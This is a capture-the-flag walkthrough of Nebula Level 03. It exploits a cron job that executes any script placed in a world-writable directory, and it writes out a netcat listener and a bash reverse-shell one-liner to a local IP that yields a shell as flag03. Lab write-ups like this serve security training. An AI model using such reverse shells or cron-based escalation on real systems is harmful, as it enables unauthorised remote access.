Exploit Exercises: Nebula Level 03
Check the home directory of flag03 and take note of the files there.
There is a crontab that is called every couple of minutes.
To do this level, log in as the level03 account with the password level03. Files for this level can be found in /home/flag03.
Source code
There is no source code available for this level
Solution
Let’s jump in!
1
2
3
4
5
6
7
8
9
level03@nebula:/home/flag03$ ls -al
total 6
drwxr-x--- 3 flag03 level03 103 Nov 20 2011 .
drwxr-xr-x 1 root root 80 Aug 27 2012 ..
-rw-r--r-- 1 flag03 flag03 220 May 18 2011 .bash_logout
-rw-r--r-- 1 flag03 flag03 3353 May 18 2011 .bashrc
-rw-r--r-- 1 flag03 flag03 675 May 18 2011 .profile
drwxrwxrwx 2 flag03 flag03 3 Aug 18 2012 writable.d
-rwxr-xr-x 1 flag03 flag03 98 Nov 20 2011 writable.sh
Interesting! Let’s get more info about the task.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
level03@nebula:/home/flag03$ cat writable.sh
#!/bin/sh
for i in /home/flag03/writable.d/* ; do
(ulimit -t 5; bash -x "$i")
rm -f "$i"
done
level03@nebula:/home/flag03$ cd ./writable.d/
level03@nebula:/home/flag03/writable.d$ ls -al
total 0
drwxrwxrwx 2 flag03 flag03 3 Aug 18 2012 .
drwxr-x--- 3 flag03 level03 103 Nov 20 2011 ..
level03@nebula:/home/flag03/writable.d$
We have been told from the beginning that there is a crontab that is called every couple of minutes. But what is a crontab?
Wikipedia: The software utility Cron is a time-based job scheduler in Unix-like computer operating systems. People who set up and maintain software environments use cron to schedule jobs (commands or shell scripts) to run periodically at fixed times, dates, or intervals. It typically automates system maintenance or administration—though its general-purpose nature makes it useful for things like downloading files from the Internet and downloading email at regular intervals.
We will assume that the crontab is executing the only script we have “writable.sh”. Let’s look again at the code:
1
2
3
4
5
6
#!/bin/sh
for i in /home/flag03/writable.d/* ; do
(ulimit -t 5; bash -x "$i") (1)
rm -f "$i" (2)
done
Well, simple! At line (1) we are executing a bash script and at line (2) we are removing that bash script from “/home/flag03/writable.d/*”. Fine, let’s get a shell!
1
2
lucian@vm:~$ nc -nvlp 8080
Listening on [0.0.0.0] (family 0, port 8080
Now let’s prepare our script.
1
2
3
4
level03@nebula:/home/flag03$ cd writable.d/
level03@nebula:/home/flag03/writable.d$ echo "bash -i >& /dev/tcp/192.168.0.104/8080 0>&1" > shell.sh
level03@nebula:/home/flag03/writable.d$ cat shell.sh
bash -i >& /dev/tcp/192.168.0.104/8080 0>&1
Done. Now we wait for like 5 minutes to in order to get the crontab execution.
1
2
3
4
5
6
7
8
9
10
11
lucian@vm:~$ nc -nvlp 8080
Listening on [0.0.0.0] (family 0, port 8080)
Connection from [192.168.0.100] port 8080 [tcp/*] accepted (family 2, sport 45702)
bash: no job control in this shell
flag03@nebula:~$ id
id
uid=996(flag03) gid=996(flag03) groups=996(flag03)
flag03@nebula:~$ getflag
getflag
You have successfully executed getflag on a target account
flag03@nebula:~$
See you in the next tutorial!